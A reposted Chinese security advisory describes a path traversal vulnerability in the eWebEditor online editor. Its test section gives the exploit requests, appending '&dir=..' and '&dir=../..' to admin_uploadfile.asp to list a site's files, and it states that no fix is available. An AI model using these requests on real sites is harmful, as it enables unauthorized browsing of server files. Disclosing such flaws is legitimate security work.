[转载]ewebeditor遍历路径漏洞
ewebeditor遍历路径漏洞Sebug.net>>>ewebeditor遍历路径漏洞
系统编号:BES2008012815
发布时间:2008-01-11
更新时间:2008-01-12
危害级别:★★★☆☆☆
受影响版本:
eWebEditor
描述:
eWebEditor是一个所见即所得的在线编辑器。顾名思义,就是能在网络上使用所见即所得的编辑方式进行编辑图文并茂的文章、新闻、讨论贴、通告、记事等多种文字处理应用。
ewebeditor/admin_uploadfile.asp
过滤不严,造成遍历路径漏洞
<* 参考:
[url]http://www.sebug.net[/url]
[url]http://www.ewebeditor.net/[/url]
*>
测试方法:
[警 告]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.****.com/../.. 看到整个网站文件了
建议:
暂无
页:
[1]